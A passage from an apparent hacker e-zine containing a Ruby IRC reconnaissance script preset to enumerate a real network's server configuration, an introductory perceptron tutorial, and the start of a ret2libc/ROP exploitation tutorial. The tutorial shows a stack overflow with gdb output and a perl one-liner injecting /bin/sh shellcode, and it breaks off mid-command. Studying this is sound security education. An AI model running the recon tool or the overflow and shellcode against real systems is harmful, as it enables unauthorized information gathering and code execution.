TypeExamine<UInt32> typeExam_UInt32;
TypeExamine<Int64> typeExam_Int64;
TypeExamine<UInt64> typeExam_UInt64;
Console::ReadKey();
Environment::Exit(0);
}
/////////////////////////////////////////////////////////////////////////////#/
//
// /)
// .--------|.|--------------------------------------------,._
#/ |#PR0JCTZ|o|>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>:>
## `--------|.|--------------------------------------------'`^
## \)
#/
###############################################################################
#!/usr/bin/env ruby
# encoding: utf-8
#
# ircrecon.rb by duper for GNY: a reconnaissance client tool for IRC networks
#
# Tested on: ruby 1.9.3dev (2011-09-23 revision 33323) [i386-openbsd4.9]
#
# Essentially, this script retrieves a list of servers connected to the network
# it has registered with via the raw IRC command LINKS. It sends a list of pre-
# defined commands to each server then waits for a proper response to output the
# results. More specifically, all ircd.conf configuration lines are enumerated
# with the STATS command. Expect the output to be highly verbose and to vary
# widely between ircd code/versions/configurations. Some daemons are naturally
# more permissive in granting read access to requested statistics. Also keep in
# mind that the larger the IRC network, the longer you're going to wait..
#
# In order to maximize reporting capability, one could cause the script to
# "oper up", i.e. set user mode +O (note the capitalized 'O' which represents
# network-wide operator status, as opposed to the lowercase o:line which is
# only for the local server. In theory, further information can be gathered by
# connecting to a network hub as a server, e.g. as is done by the /CONNECT
# command used by IRC operators.
#
require 'socket'
require 'openssl'
# Nickname to use when connecting to the target IRC server
IRC_NICK = 'IRC-Recon'
# Username part of host mask to claim when registering with the network
IRC_USER = 'ircrecon'
# "Real name" or "gecos" information part of USER command in raw IRC
IRC_INFO = %q{ircrecon.rb by duper}
# Alphabetic DNS hostname or numeric IP address of target IRC server
IRC_HOST = 'irc.rizon.net.'
# Port number that the ircd is listening on, a.k.a. P:lines.
IRC_PORT = 6697
# Will this be an SSL-based TCP connection?
IS_SSL = true
## Toy with these WAIT_* globals if you experience Excess Flood, Max Sendq, etc.
# Amount of time in seconds to wait when server load is heavy
WAIT_SECS1 = 1.4
# How long to sleep after sending a large sequence of commands
WAIT_SECS2 = 2.8
# Length of grace period between keep-alive PONG messages
PONG_SECS = 8
# Label output that is not raw IRC responses with the following text
OUT_LABEL = '{(IRC-RECON)}'
# Boolean that increases output verbosity when set to true; displays the STATS
# request that is currently awaiting a response (good for large networks.)
OUT_VERBOSE = true
## Lists of local and remote raw IRC commands
# Localized raw IRC commands, i.e. those without any server name argument.
IRC_LOC_CMDS = [ 'HELP',
'MAP', ]
# Uncommenting LIST may slow things down on large networks with many channels.
# Technically however, LIST is a localized command just like the rest.
# 'LIST', ]
# IRC network commands, i.e. raw IRC requests that take a remote server name
# as an argument. In raw IRC this appears as: "COMMAND :remote.server.name".
# Feel free to add any additional custom raw IRC commands here.. The default
# list was taken from RFC's and the response of the Unreal IRC HELPOP command.
IRC_NET_CMDS = [ 'ADMIN',
'CREDITS',
'DALINFO',
'INFO',
'LICENSE',
'LUSERS',
'MODULES',
'MOTD',
'RULES',
'SERVLIST',
'TIME',
'TRACE',
'USERS',
'VERSION', ]
### DON'T CHANGE ANYTHING BELOW HERE UNLESS YOU KNOW WHAT YOU'RE DOING!
asock, @@athread, @@acount = false, false, 0
def prem_exit(astr)
puts OUT_LABEL
puts "#{OUT_LABEL} #{astr} signal trap received; exiting prematurely."
puts OUT_LABEL
@@athread.kill() if @@athread
exit(-1)
end
Signal.trap('INT') do
puts
prem_exit('Interrupt')
end
Signal.trap('PIPE') { prem_exit('Pipe') }
Signal.trap('TERM') { prem_exit('Termination') }
def show_except(aexc = nil)
return false if aexc.nil?
$stderr.puts(aexc.backtrace.join("\n"))
$stderr.puts(aexc.inspect)
true
end
puts OUT_LABEL
puts "#{OUT_LABEL} ircrecon.rb script by duper <super@deathrow.vistech.net>"
puts "#{OUT_LABEL} #{RUBY_DESCRIPTION}"
puts OUT_LABEL
begin
print "#{OUT_LABEL} Trying..."
if IS_SSL
include OpenSSL
@@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
@@asock_context = SSL::SSLContext.new()
@@asock_socket = SSL::SSLSocket.new(@@asock, @@asock_context)
@@asock_socket.sync_close = true
@@asock_socket.connect()
@@asock = @@asock_socket
puts %q{SSL-IRC connection established!}
puts OUT_LABEL
puts "#{OUT_LABEL} #{@@asock_socket.peer_cert_chain}"
acipher = @@asock_socket.cipher
analgo, aproto, akeysz = acipher[0], acipher[1], acipher[2]
puts OUT_LABEL
puts "#{OUT_LABEL} Algorithm: #{analgo} Protocol: #{aproto} Key Size: #{akeysz} bits"
else
@@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
puts %q{IRC connection established!}
end
puts OUT_LABEL
rescue Exception => e
puts %q{'TCP connection failed!'}
show_except(e)
exit(-1)
end
print "#{OUT_LABEL} Connected to port #{IRC_PORT} on host #{IRC_HOST}"
print " (SSL-enabled)" if IS_SSL
puts
puts "#{OUT_LABEL} Registering client info with IRC network.."
puts OUT_LABEL
begin
@@asock.puts('NICK ' << IRC_NICK)
@@asock.puts('USER ' << IRC_USER << " . . :" << IRC_INFO)
rescue Exception => e
show_except(e)
exit(-2)
end
loop do
l = nil
begin
l = @@asock.gets()
break if !l or l.empty?
rescue Exception => e
puts %q{Error reading data while registering IRC client!}
show_except(e)
exit(-3)
end
puts l
# Handle nospoof patch that deters all forms of blindly spoofing IP addresses
if l[0,5].upcase.start_with?('PING ')
@@asock.puts('PONG :' << l.split[1])
puts "#{OUT_LABEL} Responded to target server's nospoof PING nonce"
break
end
# Nickname already in use
if l.include?(' 433 ')
@@acount += 1
@@asock.puts("NICK #{IRC_NICK}#{@@acount}")
next
end
# Read end of /MOTD, we're already registered! :-)
if l.include?(' 376 ')
puts "#{OUT_LABEL} Target server is not using a nospoof patch!"
break
end
end
servs, @@linez = [], []
begin
print "#{OUT_LABEL} Enumerating linked server names:"
@@asock.puts('LINKS')
loop do
l = @@asock.gets()
next if !l or l.empty?
x = l.split[3 .. -1]
next if x.nil? or x.empty?
y = l.split[0 .. 2].join(' ')
if y.include?(' 364 ')
@@linez << l
@@servs << x.first
next
end
break if y.include?(' 365 ')
end
rescue Exception => e
puts %q{Error encountered while reading LINKS response!}
show_except(e)
exit(-4)
end
servs.each { |s| print ' ' << s }
linez.each { |k| puts k }
puts
puts "#{OUT_LABEL} Starting 'keep-alive' PONG sending thread"
athread = Thread.new() {
begin
loop do
@@asock.puts('PONG :' << IRC_HOST)
sleep(PONG_SECS)
end
rescue Exception => e
puts %q{Caught exception while sending 'keep-alive' PONG message!}
$stderr.puts(e.inspect)
return false
end
true
}
puts "#{OUT_LABEL} Executing list of localized raw IRC commands"
begin
IRC_LOC_CMDS.each { |c| @@asock.puts(c) }
rescue Exception => e
puts %q{Unable to send local command request data to server}
show_except(e)
exit(-5)
end
load_flag, @@ahash = false, {}
# We're getting the STATS reports for the ircd.conf lines individually, so we
# don't miss any due to the server load being too high at a particular time.
# This is bound to happen consistently on a large/busy IRC network--be prepared
# to wait a while for the results.
def get_stats(achar, aserv = '')
begin
if aserv.nil? or aserv.empty?
@@asock.puts('STATS ' << achar)
else
@@asock.puts('STATS ' << achar << ' ' << aserv)
end
loop do
l = @@asock.gets()
return false if not l or l.empty?
# End of /STATS report
break if l.include?(' 219 ')
# Permission denied (not an IRC operator)
break if l.include?(' 481 ')
# Default /STATS response ("Unused", according to RFC2812 Section 5.1)
break if l.include?(' 210 ')
# Server load is temporarily too heavy
if l.include?(' 263 ')
if !@@load_flag
@@load_flag = true
print "#{OUT_LABEL} Warning: Server load is temporarily too heavy!"
puts ' (This might take a while)'
end
# puts statement that was used for debugging current STATS status
if OUT_VERBOSE
@@ahash[achar] = Hash.new if !@@ahash[achar]
if !@@ahash[achar][aserv]
@@ahash[achar][aserv] = true
puts "#{OUT_LABEL} STATS #{achar} #{aserv}"
end
end
sleep(WAIT_SECS1)
@@asock.puts('STATS ' << achar << ' ' << aserv)
next
end
puts l
end
rescue Exception => e
show_except(e)
end
sleep(WAIT_SECS1)
true
end
puts "#{OUT_LABEL} Executing list of remote raw IRC commands"
servs.each do |s|
puts "#{OUT_LABEL} Beginning to enumerate data from #{s} ..."
IRC_NET_CMDS.each do |c|
begin
@@asock.puts(c << ' ' << s)
rescue Exception => e
show_except(e)
end
end
('a' .. 'z').each { |x| get_stats(x, s) }
sleep(WAIT_SECS2)
('A' .. 'Z').each { |x| get_stats(x, s) }
puts "#{OUT_LABEL} Finished enumerating data from #{s}!"
end
begin
puts "#{OUT_LABEL} Reconnaissance sequence complete on all servers!"
print "#{OUT_LABEL} Waiting on cleanup of outstanding threads"
@@athread.kill() if @@athread
puts "Done!"
puts "#{OUT_LABEL} Displaying remaining server responses, then exiting."
rescue
end
loop do
begin
l = @@asock.gets()
next if !l or l.empty?
if l.start_with?('ERROR')
puts l
break
end
x = l.split[3 .. -1]
next if !x or x.empty?
y = l.split[0 .. 2].join(' ')
# Ignore erroneous STATS response codes
next if y.include?(' 210 ') or y.include?(' 481 ') or y.include?(' 219 ')
z = x.join(' ')
next if not z or z.size <= 1
z = z[1 .. - 1] if z.start_with?(':')
print '[' << y.split.first[1 .. -1] << '] '
puts z
rescue Exception => e
$stderr.puts(e.inspect)
break
end
end
puts OUT_LABEL
puts "#{OUT_LABEL} Information gathering successful!"
puts OUT_LABEL
exit(0)
#EOF
################################################################################
#***END*OF*FILE**DUPER'S*CODE*CORNER**A*HAXNET*#PROJECTS*PRODUCTION*(TM)2011***#
################################################################################
[==================================================================================================]
-=[ 0x05 How Skynet Works: An Introduction to Neural Networks
-=[ Author: elchupathingy
-=[ IRC: irc.gonullyourself.org #gny
Skynet was designed as a system to determine the greatest threat and determine the best course
of action for survival. The real question about Skynet is not whether or not it will kill us, but
rather how it will know to kill humans. The answer to that is quite simple through an understanding
of machine learning. How does this work, and how does Skynet come to the conclusion to kill all
humans?
This is an area of Computer Science that describes and implements ways for computers to learn
how to recognize and, in a way, "think" about data that is inputted into its learning algorithm. But
what makes this possible?
To continue this in depth, we need to first look into how the human brain works. At a high
level, a symphony of biological, chemical, and electrical events and reactions combine to form what
we perceive to be conscious thought. This is a rather simple view of the actual details, so let's
take a closer look at one of these biological, chemical, and electrical events.
The following is a simple ASCII art representation of a neuron:
\/
Axon /\/<
\/ \/ \ /
\/ \__| \ _________ __/
\_____\__ / _______ \ / \ \/
>\ | \_________/ / \ \_/ |_____/___<
\__/| ___________/ \__ | \
___| / \__/ /\
/ \___/ \ \
/\ / \ \ \
_/\ \ /\ \
/ \ \ \
/\ /\ Nucleus Axon Terminal
\
\
\
Dendrites
From left to right:
Dendrites: The inputs that receive electrochemical stimulation
Nucleus: The "brain" and control center of the neuron
The nucleus determines when the neuron fires and various other functions, but
for this article we will only concern ourselves with its control over the
firing process.
Axon: Transmits electrical signals from the nucleus to the Axon terminals
Axon Terminal: Emits electric impulses to be sent to other connecting neurons in the brain
It should be noted that this is only a typical neuron, and there are many, many different kinds.
Neurons function by accepting chemical inputs, building up an electrical charge, and firing an
impulse when it is greater than a precisely defined threshold of the neuron. The event of firing an
impulse is known as action potential. This event causes more chemicals to be released and, in
effect, starts a chain reaction. This is the basic principle of how the brain performs computation.
Now, how is this useful? A simple model of the neuron has to be developed. Lucky for this article,
this has already been accomplished by Frank Rosenblatt, and it is called a perceptron. A perceptron
is an artificial representation of a neural network and its ability to think and execute tasks.
It contains:
A set of inputs: X
A set of weights: W
A threshold function: G
A threshold: T
Like a neuron, the perceptron will only fire if its threshold is exceeded.
The set of inputs, X, for this article will strictly be binary.
The set of weights are floating point values 0 < W < 1.
The threshold function is the summation of products of the weights and corresponding inputs, such
that:
/ \
_N_ | _M_ |
\ | \ |
/__ | /__ Wij * Xij |
i=0 | j=0 |
\ /
So, these pieces come together to form our perceptron. It can receive |x| inputs and, upon putting
these inputs through the threshold function, it will either fire (returning a 1) or not fire
(returning a 0).
Now, to make this useful a few technicalities need to be covered. The first is that this model of
the neuron, the perceptron, can have its weights changed but not its thresholds. Since we cannot
directly change the threshold of the perceptron, we must add another input called the bias input.
The bias input is a trick to allow the perceptron to change the threshold. This is done by fixing
its value to -1. Doing so in effect makes the threshold of our perceptron a 0, but it also has the
ability to fluctuate with the bias input's weight. This fluctuation allows the perceptron to find
the optimal firing threshold. Shown below is the summation of the weights and inputs, including the
bias input. The bias input is typically the first input, but this is not required and is just
convention.
-1 * W00 + X10 * W10 + X20 * W20 ... Xi0 * Wi0 = y0
-1 * W01 + X11 * W11 + X21 * W21 ... Xi1 * Wi0 = y1
.
.
.
-1 * Wi(j - 3 + Xi(j - 2) * Wi(j - 2) + Xi(j - 1) * Wi(j - 1) ... Xij * Wij = y
So, what does this mean? Now that the bias node has been added to the inputs, it has effectively
changed our threshold value to 0 and provided the ability to change the threshold of the perceptron
through manipulation of the weights. This makes the learning ability of the perceptron much stronger.
Let's now cover the manual way of setting up a perceptron to learn some action or result. The basic
logic operators are quite simple - they require two inputs and produce a single output, which can
model whether the perceptron fires or not.
Let's first look at OR.
Truth table:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 1
The truth table shows us the inputs that our perceptron will receive (X1 and X2) and the expected
output (Y1). Now, lets figure out how to make the perceptron learn this logical function. First, we
need to figure out what its weights will be. This is simple; they will start out as random numbers,
such that -1.0 < Wij < 1.0. They can be one of infinite possibilities. As the neuron learns, the
weights will change to simulate how a neuron learns. A neuron learns through a process of trial and
error with the correct chemical balances to produce the correct firing threshold. The neuron in our
context does the same through changing its weights.
If the sum of the products of the weights and inputs doesn't cause the neuron to fire when it was
supposed to, then the weights must be changed so that the neuron fires the next time it sees this
input. Now, if the neuron is constantly changing the weights to reflect when it was supposed to fire
and not supposed to fire, then the neuron can be said to be unstable. Thus we must introduce a
mechanism to reduce the amount of instability in the neuron. This will be discussed further on. But,
as it stands the neuron will never learn the entire problem. It will only learn a few of the inputs
and expected outputs at a time and never completely generalize a solution.
How can this be solved? The neuron simply "slows down" its ability to learn by changing the amount
by which the weights are allowed to change. This is represented by N, or the learning rate (it has
a fancy Greek name, but learning rate is more specific).
It seems that we have strayed further away from getting our neuron to learn the simple logical
operation OR, but all of this is needed.
Back to the learning and weight changing. To get the new weight, we need to think of how this new
weight will be found. If the weights can be seen as a function to get how we change it, we need to
find the derivative of this function. The real derivation is quite annoying, so here is a simplified
version that will suit the needs of the perceptron:
dWij = ( Tk - Yk ) Xi
The change of the weights, W, can be seen as a function of the Target outputs, Tk, and the real
outputs, Yk, and the input, Xi, such that the new weight, Wij, will change in relation to the
difference of the targets and outputs multiplied by the inputs. But, this raises the earlier problem
of stability. In this manner the neuron will instantly learn the inputs and will ultimately forget
any prior learning. Thus, we must retard its learning speed. This is accomplished through the use of
a learning rate or eta, N. This will effectively act as a mechanism to remember old inputs. It does
so by only taking a portion of the change needed to fix the neuron for the current inputs rather
than the required amount. On a side note, it has been found that a N value that satisfies
0.1 < N < 0.4 is more than sufficient and bigger or smaller values lead to instability. With that
being said, we have arrived at the following formula:
Wij = Wij + N( Tk - Yk )Xi
With this, we can finally begin to learn our logical operation OR.
The first step is to choose the weights for our inputs, minding that there are in fact three weights
that need to be picked out.
W0 = -0.05, W1 = -0.02, W2 = 0.02
For the inputs, we will use the above truth table conveniently reproduced below:
Truth table:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 1
Let's start slugging through some numbers:
X1 = 0 and X2 = 0
Y1: -1 * -0.05 + 0 * -0.02 + 0 * 0.02 = 0.05
The neuron fired when it shouldn't have, so the weights need to be modified.
W0 = W0 + N ( 0 - 1 ) * -1 = -0.55
W1 = W1 + N ( 0 - 1 ) * 0 = -0.03125
W2 = W2 + N ( 0 - 1 ) * 0 = 0.03125
Ok, after fixing the weights for this input, we need to test the next input.
X1 = 1 and X2 = 0
Y1: -1 * -0.55 + 1 * -0.03125 + 0 * 0.03125 = 0.51875
This fired when it was supposed to, so the weights do not need to be adjusted.
X1 = 0 and X2 = 1
Y1: -1 * -0.55 + 0 * -0.03125 + 1 * 0.03125 = 0.58125
The neuron fired when it should have, so the weights do not need to be adjusted.
X1 = 1 and X2 = 1
Y1: -1 * -0.55 + 1 * -0.03125 + 1 * 0.03125 = 0.55
Again, this neuron fired when it should have, so no weight changes are needed. Now, the process is
complete... for this iteration. We have to continue doing this until the network stabilizes and this
happens when all the outputs are equal to the targets and the weights stop moving around. This will
take 4-5 iterations for this particular example.
Eventually, the weights will settle down and the perceptron will have learned this function.
But, how does this work, exactly? It works by dividing the set of solutions into two groups, such
that if we graph it we can draw a line between the points.
*'s mean the perceptron fired.
+'s mean the perceptron did not fire.
1|* *
|
|
|
|
|+___________*
0 1
Looking at this graph, it is easy to see that there is a line that divides the points, making it
look like the following:
1|* *
\
|\
| \
| \
|+__\________*
0 \ 1
As the graph shows, the line divides them with all the *'s on one side and all the +'s on the other.
Now, where did this line come from? It came from the weights, which in this example are the
coefficients to the line function:
aX + bY = C
There is a lengthy process to prove this through a few vector calculations and using the inner
product of two vectors, but the basic idea of this is that there exists a line, plane, or hyperplane
through the set of points that separates the points into two distinct sets.
Planes and hyperplanes? Yes, these are the solutions for when there are more than two inputs into
the perceptron. An example is found at the end of the article.
So, a problem that can be solved by a perceptron has to have the following properties:
1: Linearly separable via a line, plane, or hyperplane.
2: Responds to a firing or no firing, thus a yes or no question essentially.
3: Grouped into distinct classes.
Let's look at the following example of something that is not linearly separable by a line.
Logical function XOR:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 0
The Graph of XOR:
1|* +
|
|
|
|
|+___________*
0 1
Looking at the truth table doesn't shed any light on whether this is linearly separable or not, but
looking at the graph shows that there is no line such that the +'s and *'s are in separate
partitions. Thus, XOR cannot be solved like we did OR; it must be put into a higher dimension. We
will use 3D to do that.
We will add another bit of information to separate the two groups, *'s and +'s, so that our
perceptron can solve it.
Let's look over at the JavaScript and HTML page to help do this for us.
When first loading this page, it will have the defaults for the OR function we worked out earlier.
On this page, the number of Iterations and Learning Rate may be changed, and these various options
can be tested by pressing the "start" button. But, what we want to focus on is the in the Code text
area.
The default looks like the following:
var inputs =
[
[ 0, 0 ],
[ 0, 1 ],
[ 1, 0 ],
[ 1, 1 ]
];
var targets =
[
0,
1,
1,
1
];
var dimensions = 2;
Notice that they are arrays and 'input' is a 2D array. The length of 'inputs' must be equal to that
of 'targets', and 'dimensions' must be equal to the length of each sub-array of 'inputs'. This is so
that the code can make the weights vector correctly. Now, we need to make the change to the code
section so that we can get our perceptron to learn the XOR logical operation.
var inputs =
[
[ 0, 0, 1 ],
[ 0, 1, 0 ],
[ 1, 0, 0 ],
[ 1, 1, 0 ]
];
First, we need to change the inputs to be in a 3D space. We have lifted up the first input so that
it will not be in the same plane as the other inputs. This single change is all that is needed to
make the XOR learnable.
The targets vector is changed to the following:
var targets =
[
0,
1,
1,
0
];
This is to reflect how the XOR operation works. And, finally the number of dimensions needs to be
changed to 3.
var dimensions = 3;
Now, change the number of iterations to 30, leave the Learning Rate at the default 0.25, and click
start.
The perceptron should be able to solve the problem. If it did not, hit start again and scroll
through the output textarea to see if it has solved it. In the 'weights' textarea are the various
weight values that are used during the learning process. An exercise would be to look at the weights
as the perceptron tries to learn the XOR using a 2D input matrix.
The graph for this looks like the following:
(0,0,1)|+
|
|
|
(0,0,0)|__________________*(0,1,0)
/
/
/
/
(1,0,0)*/
+(1,1,0)
It's somewhat difficult to reproduce a 3d plane in ASCII, so just imagine one going through the +'s
and *'s. The same idea before applies here; the perceptron is looking to solve the equation of the
plane that separates the two sets. This can be expanded further, but even ASCII lacks the ability to
draw in 4D.
So, how is this a process of learning? The process detailed above is a process of a single
perceptron, neuron, to learn how to solve a linearly separable set of points. It has gained the
ability to generalize a solution to a simple problem and is able to accurately give an answer to all
of its inputs. But, we have simply given it all of the possible outcomes and trained our perceptron
on the actual data. In practice, this is not possible.
What happens now is that to learn against bigger sets of data, a process of training must be
developed. The proper way to train a perceptron or a neural network in an assisted manner is to feed
it half of the data then check against the other half of the data. Using the perceptron that is in
the JavaScript, we can do just that using provided data for our use.
Let's look at the following data collected from the Pima Indian's dataset:
var inputs = [
[6,148,72,35,0,33.6,0.627,50,1],
[1,85,66,29,0,26.6,0.351,31,0],
[8,183,64,0,0,23.3,0.672,32,1],
[1,89,66,23,94,28.1,0.167,21,0],
[0,137,40,35,168,43.1,2.288,33,1],
[5,116,74,0,0,25.6,0.201,30,0],
[3,78,50,32,88,31.0,0.248,26,1],
[10,115,0,0,0,35.3,0.134,29,0],
[2,197,70,45,543,30.5,0.158,53,1],
[8,125,96,0,0,0.0,0.232,54,1],
[4,110,92,0,0,37.6,0.191,30,0],
[10,168,74,0,0,38.0,0.537,34,1],
[10,139,80,0,0,27.1,1.441,57,0],
[1,189,60,23,846,30.1,0.398,59,1],
[5,166,72,19,175,25.8,0.587,51,1],
[7,100,0,0,0,30.0,0.484,32,1],
[0,118,84,47,230,45.8,0.551,31,1],
[7,107,74,0,0,29.6,0.254,31,1],
[1,103,30,38,83,43.3,0.183,33,0],
[1,115,70,30,96,34.6,0.529,32,1],
[3,126,88,41,235,39.3,0.704,27,0],
[8,99,84,0,0,35.4,0.388,50,0],
[7,196,90,0,0,39.8,0.451,41,1],
[9,119,80,35,0,29.0,0.263,29,1],
[11,143,94,33,146,36.6,0.254,51,1],
[10,125,70,26,115,31.1,0.205,41,1],
[7,147,76,0,0,39.4,0.257,43,1],
[1,97,66,15,140,23.2,0.487,22,0],
[13,145,82,19,110,22.2,0.245,57,0],
[5,117,92,0,0,34.1,0.337,38,0],
[5,109,75,26,0,36.0,0.546,60,0],
[3,158,76,36,245,31.6,0.851,28,1],
[3,88,58,11,54,24.8,0.267,22,0],
[6,92,92,0,0,19.9,0.188,28,0],
[10,122,78,31,0,27.6,0.512,45,0],
[4,103,60,33,192,24.0,0.966,33,0],
[11,138,76,0,0,33.2,0.420,35,0],
[9,102,76,37,0,32.9,0.665,46,1],
[2,90,68,42,0,38.2,0.503,27,1],
[4,111,72,47,207,37.1,1.390,56,1],
[3,180,64,25,70,34.0,0.271,26,0],
[7,133,84,0,0,40.2,0.696,37,0],
[7,106,92,18,0,22.7,0.235,48,0],
[9,171,110,24,240,45.4,0.721,54,1],
[7,159,64,0,0,27.4,0.294,40,0],
[0,180,66,39,0,42.0,1.893,25,1],
[1,146,56,0,0,29.7,0.564,29,0]
];
var targets = [];
for( var i = 0; i < inputs.length; i++ )
{
targets.push( inputs[i].pop() );
}
var dimensions = 9;
This dataset represents a subset of Pima Indian population and if each individual has diabetes (the
last column, which is popped off and put into 'targets'). If this code is placed into the code
textarea, the accuracy of the perceptron correctly telling if someone has diabetes or not is almost
non-existent. Unlike the above examples, this data set cannot be graphed and is a good example of
real world data. From this, you cannot train on all of the data, but rather you must train on a
subset of the data and then perform a check on the rest of the data, thus more accurately gauging
the perceptron's ability to learn and generalize its solution.
How do we do the training on the subset of the data? On the HTML page, there is a check box that,
when checked, will simply split the data in half and train on one half of the data and test with the
other half. This is quite useful and can gauge how well the perceptron is able to generalize its
solution to the set of data that has been presented.
This method can help verify how well the perceptron has learned something. Another method to help
improve the learning ability of the perceptron is to normalize the data or, in essence, take out the
data's variance which will allow the perceptron to more easily learn the problem.
You, the reader, has been hoping all this time to learn the answer to the initial question of this
article - how does Skynet work? However, all you got instead was some garbled math and a web page.
But, the principle behind this method is how Skynet could learn, classify dangerous enemies, and
ultimately kill all humans.
Some other applications for this perceptron and neural networks are:
- OCR to break captchas.
- Giving a user recommend items.
- Predicting future events based on past ones.
- Fitting a line, plane, or hyperplane to a set of data.
- Many more.
Enjoy, Elchupathingy
[==================================================================================================]
-=[ 0x06 Defeating NX/DEP With return-to-libc and ROP
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
Table of Contents
I. Introduction
II. Background
III. The Problem
IV. Return-to-libc
V. Return-to-PLT
VI. Return-to-PLT + GOT Overwrite
VII. Return-to-libc by neg ROP
VIII. References and Further Reading
I. Introduction
===============
The return-to-libc attack, commonly abbreviated as ret2libc, is a method of exploiting memory
corruption vulnerabilities on systems enabling non-executable (NX) stacks. First publicly discussed
by the security researcher Solar Designer in the late 90s, ret2libc attacks are still relevant in
the modern realm of exploitation, but have mostly made way for Return-Oriented Programming (ROP),
which is a generalization of the ret2libc technique.
It should be noted that all technical examples in this paper were performed on a Fedora Core 14
machine. While many of these techniques are universal, some OSes may employ certain memory
protections by default that break the examples. For instance, stack canaries are enabled by default
on Ubuntu systems and should be disabled with the gcc -fno-stack-protector-all flag at compile-time.
II. Background
==============
Before proceeding, the reader should be familiar with traditional stack-based buffer overflows. For
the sake of comprehension, a short review will be provided. It should be noted that in this simple
example, memory protections such as DEP, ASLR, and stack canaries are disabled.
Given the following source code (from http://en.wikipedia.org/wiki/Stack_buffer_overflow):
#include <string.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking...
}
int main (int argc, char **argv)
{
foo(argv[1]);
}
We can see that argv[1] is passed as an argument to the function foo(). A buffer of 12 bytes is
allocated and given the name 'c'. A call to strcpy() copies the string from the buffer 'bar'
(formerly argv[1]) into 'c'. The problem lies within the fact that no bounds check is performed on
the buffer 'bar' before being copied into 'c', allowing any string greater than 12 bytes long
(trailing null byte included) to be written past the 12 bytes allocated. By allowing this, we have
the potential to overwrite data on the stack critical to the program's behavior.
Specifically, a pointer saved on the stack named the "return address" is of particular interest to
us. This pointer is present on the stack due to the way function calls are performed within
programs. Let's step our way through foo() in the program above. Here, we set a breakpoint just
before the call is initiated:
Breakpoint 1, 0x080483f2 in main ()
(gdb) x/5i $eip
=> 0x80483f2 <main+20>: call 0x80483c4 <foo>
0x80483f7 <main+25>: leave
0x80483f8 <main+26>: ret
0x80483f9: nop
0x80483fa: nop
(gdb) x/16x $esp
0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4
0xbfffefc0: 0x08048400 0x00000000 0xbffff048 0x00212e36
0xbfffefd0: 0x00000002 0xbffff074 0xbffff080 0xb7fff478
0xbfffefe0: 0x00110414 0xffffffff 0x001f8fbc 0x0804822c
(gdb)
We start off by looking at the state of the stack before the function call. Continuing, let's take
this step-by-step.
(gdb) si
0x080483c4 in foo ()
(gdb) x/16x $esp
0xbfffefac: 0x080483f7 0xbffff265 0x08048310 0x0804840b
0xbfffefbc: 0x00381ff4 0x08048400 0x00000000 0xbffff048
0xbfffefcc: 0x00212e36 0x00000002 0xbffff074 0xbffff080
0xbfffefdc: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
For those unfamiliar with gdb, note that the 'si' command is shorthand for 'step instruction', which
allows us to walk through the assembly code instruction-by-instruction. We see that by entering
foo(), the pointer 0x080483f7 is pushed onto the stack. Looking above, we notice that this is the
address of the next instruction within main(). This pointer is the return address and will later be
popped back into %eip in the epilogue of foo(). Continuing:
(gdb) x/10i $eip
=> 0x80483c4 <foo>: push %ebp ; Push the frame pointer onto the stack
0x80483c5 <foo+1>: mov %esp,%ebp ; Address of saved fp becomes new %ebp
0x80483c7 <foo+3>: sub $0x28,%esp ; Allocate space for local variables
0x80483ca <foo+6>: mov 0x8(%ebp),%eax ; Copy pointer to 'bar' to %eax
0x80483cd <foo+9>: mov %eax,0x4(%esp) ; Set up 'bar' as 2nd arg to strcpy()
0x80483d1 <foo+13>: lea -0x14(%ebp),%eax ; Copy pointer to 'c' to %eax
0x80483d4 <foo+16>: mov %eax,(%esp) ; Set up 'c' as 1st arg to strcpy()
0x80483d7 <foo+19>: call 0x80482f4 <strcpy@plt> ; Perform library call to strcpy()
0x80483dc <foo+24>: leave ; Copy %ebp to %esp, pop fp to %ebp
0x80483dd <foo+25>: ret ; Pop return address to %eip
(gdb)
By manipulating the return address stored on the stack before the function epilogue, we directly
influence the value of %eip, redirecting execution of the program to anywhere we choose.
Setting a breakpoint for 0x80483d7, let's look at the stack just before the strcpy() call:
Breakpoint 2, 0x080483d7 in foo ()
(gdb) x/16x $esp
0xbfffef80: 0xbfffef94 0xbffff265 0xbfffef98 0x080482c0
0xbfffef90: 0x00000000 0x08049644 0xbfffefc8 0x08048419
0xbfffefa0: 0xb7fff478 0x00382cc0 0xbfffefc8 0x080483f7
0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4
(gdb)
We see that strcpy() is being given two pointers as first and second arguments, a pointer to the
buffer 'c', and a pointer to the buffer 'bar', respectively. We also see our saved frame pointer
and return address located lower on the stack at 0xbfffefa8 and 0xbfffefac, respectively. By
writing 0xbfffefb0 - 0xbfffef94 = 0x1c = 28 bytes to 'c', we have full EIP overwrite and control
over the program:
(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x80483dd
Breakpoint 3 at 0x80483dd
(gdb) run `perl -e'print "A"x28'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/x $esp
0xbfffef8c: 0x41414141
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x080483dd in foo ()
(gdb)
By stashing compiled code on the stack itself, we redirect execution to the location of our
"shellcode" and drop a shell:
(gdb) run `perl -e'print "A"x28 . "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0
\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28 . "\xeb\x16\x5b\x31
